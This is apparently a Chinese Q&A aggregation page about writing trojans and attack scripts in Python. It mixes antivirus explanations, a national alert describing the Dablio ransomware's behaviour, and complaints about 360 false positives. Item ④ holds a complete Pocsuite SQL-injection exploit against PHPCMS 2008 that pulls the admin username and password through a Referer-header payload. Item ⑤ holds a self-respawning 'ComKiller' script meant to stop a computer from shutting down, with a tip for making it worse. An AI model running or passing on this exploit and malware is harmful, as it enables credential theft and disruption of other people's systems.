python寫木馬

① Haskell+scheme+python編寫的木馬程序殺毒軟體可以識別嗎

殺軟是依靠病毒的特徵碼或行為進行分析的，如果該木馬的特徵碼在殺軟資料庫中便可以識別，並且殺軟現在有主動防禦，會依據木馬的行為進行分析，木馬如果進行了一些行為被殺軟發現，就會被查殺

② Python能不能寫病毒

國家計算機病毒應急處理中心通過對互聯網的監測發現，一種利用python語言編寫的惡意木馬程序出現。該惡意程序通過偽裝成多款常用應用軟體等進行傳播，誘使計算機用戶下載安裝。
這個新型的勒索病毒叫Dablio，理論上可以感染下列文件類型，也就是你電腦中以下列名字作為後綴名的文件，全部打不開。
相關推薦：《Python入門教程》
看了上面的文件類型，我也服了。這做毒的比我還想的周到。合著有點用的文件全想感染。
我們分析發現，該惡意軟體就是一款勒索軟體，其具有以下功能：
一、木馬會判斷自身進程名是否為systern.exe。如果不是，則將自身復制為C:UsersPublicsystern.exe 並執行；
二、釋放s.bat批處理腳本，關閉各種資料庫和web服務及進程；
三、遍歷受感染操作系統的所有盤符中的指定文件進行加密，加密後修改文件的擴展名為MyChemicalRomance4EVER；
四、木馬會調用系統的wevtutil命令，對系統日誌中的「系統」、「安全」和「應用程序」三部分日誌內容進行清理，並刪除自身；
五、使用AES對稱演算法進行加密；
另外，惡意木馬程序完成加密後，會在操作系統中生成一個存有勒索信息的文本文件，提示並要求受感染的用戶訪問指定的Web網站支付一定的比特幣（電子貨幣），系統中加密的文件才可以被解鎖。
專家提醒：
針對這種情況，國家計算機病毒應急處理中心建議廣大計算機用戶採取如下防範措施：
（一）不要從陌生的網站下載應用程序。
（二）建議打開操作系統中防病毒軟體的「實時監控」功能，對操作操作進行主動防禦，這樣可以第一時間監控未知病毒的入侵活動。

③ Python能寫攻擊腳本嗎

那就要看你要寫什麼樣的攻擊腳本了，你可以攻擊伺服器，攻擊個人電腦等等，行是肯定行，但如果要寫病毒一般沒人選Python，因為Python是開源的。。。

④ 如何使用python編寫poc，exp

然後來談談自己的看法：
其實吧，無論烏雲的Tangscan也好，知道創宇的Pocsuite也好，還有Beebeeto也好（Bugscan沒寫過，不是特別了解不過應該差不多），關於Web的Poc和Exp，都極度依賴於兩個Python庫。
1. Requests ： 模擬Web的請求和響應等交互動作。
2. Re ： 正則表達式，用來驗證返回的結果是否符合漏洞的預期，從而驗證漏洞是否存在。
其餘的大部分代碼都是漏洞的信息。
Pocsuite官方文檔例子：
#!/usr/bin/env python
# coding: utf-8
import re
import urlparse
from t import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register

class TestPOC(POCBase):
vulID = '62274' # ssvid
version = '1'
author = ['Medici.Yan']
vulDate = '2011-11-21'
createDate = '2015-09-23'
updateDate = '2015-09-23'
references = ['']
name = '_62274_phpcms_2008_place_sql_inj_PoC'
appPowerLink = ''
appName = 'PHPCMS'
appVersion = '2008'
vulType = 'SQL Injection'
desc = '''
phpcms 2008 中廣告模塊，存在參數過濾不嚴，
導致了sql注入漏洞，如果對方伺服器開啟了錯誤顯示，可直接利用，
如果關閉了錯誤顯示，可以採用基於時間和錯誤的盲注
'''
samples = ['']

def _attack(self):
result = {}
vulurl = urlparse.urljoin(self.url, '/data/js.php?id=1')
payload = "1', (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(char(45,45),username,char(45,45,45),password,char(45,45)) from phpcms_member limit 1))a from information_schema.tables group by a)b), '0')#"
head = {
'Referer': payload
}
resp = req.get(vulurl, headers=head)
if resp.status_code == 200:
match_result = re.search(r'Duplicate entry \'1--(.+)---(.+)--\' for key', resp.content, re.I | re.M)
if match_result:
result['AdminInfo'] = {}
result['AdminInfo']['Username'] = match_result.group(1)
result['AdminInfo']['Password'] = match_result.group(2)
return self.parse_attack(result)

def _verify(self):
result = {}
vulurl = urlparse.urljoin(self.url, '/data/js.php?id=1')
payload = "1', (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2), md5(1))a from information_schema.tables group by a)b), '0')#"
head = {
'Referer': payload
}
resp = req.get(vulurl, headers=head)
if resp.status_code == 200 and '' in resp.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vulurl
result['VerifyInfo']['Payload'] = payload

return self.parse_attack(result)

def parse_attack(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('Internet nothing returned')
return output

register(TestPOC)

可以看到從代碼11到28行都是漏洞的一些信息，真正的功能函數只有_attack和_verify兩個而已。甚至這個例子有點繁瑣了，現在大大們都是把exploit寫在verify裡面，所以真正起到功能的，也就不到十行的代碼。pocsuite.net 這個庫其實就是Requests。用Requests模擬手工注入的Post提交，用正則匹配提取和驗證必要信息，簡單說起來就是這兩個步驟。
這么一來你再看看其他的由Python寫的Poc和Exp就大同小異了。Poc/Exp總的說來就只是用程序代替手工的過程而已，所以了解了漏洞的原理和認證方法之後就簡單了。
代碼很簡單最主要的，還是對於漏洞的理解。
先說到這里，有空之後再寫一些別的。

⑤ python能寫病毒或者木馬什麼的嗎

# 這是一個小病毒，名叫ComKiller(計算機殺手)
# 效果：運行約10秒後無法正常關機
# 註：把那兩行 time.sleep(0.1) 去掉效果更好哦:)
import os
import signal
import ctypes
import time
import threading
from pathlib import Path

def help_sos():
cmdr = os.system("start python %s" % FileName)

def Error():
while True:
try:
help_sos()
except BaseException:
help_sos()
time.sleep(0.1)

signal.signal(signal.SIGTERM, help_sos)
FileName = Path(__file__).name
while True:
time.sleep(1)
T = threading.Thread(target = Error, args = ())
T.start()
#僅用於娛樂，干什麼非法的事情和我無關！

⑥ 我自己用python寫的程序,運行時360安全衛士是木馬為什麼

因為360就是個垃圾，不交保護費就殺你代碼。你把你編程用到的目錄全加白名單試試。
遠離360，珍愛生命。

⑦ Python 如何寫腳本

以Python2.7操作為例：

1、首先需要打開電腦桌面，按開始的快捷鍵，點擊Python2.7如圖所示的選項進入。

⑧ 安裝Python(x,y)時，360提示有木馬，這是什麼情況

1.你要確保你沒有木馬。如果真有木馬，360提示也是對的。如果你機器上中了木馬，360在特定情況下沒有檢測到。或者是頑固型木馬。360殺不掉。這時你下載一個文件，它就感染一個文件。

2.別理360，忽略後，繼續安裝。如果真有木馬。360會幫你殺掉的。

4.360提示錯了。不是木馬。只是安裝程序需要修改注冊表，訪問其它程序的的目錄。僅此而亦。python的程序很容易被誤判成木馬。 這個很有些冤枉。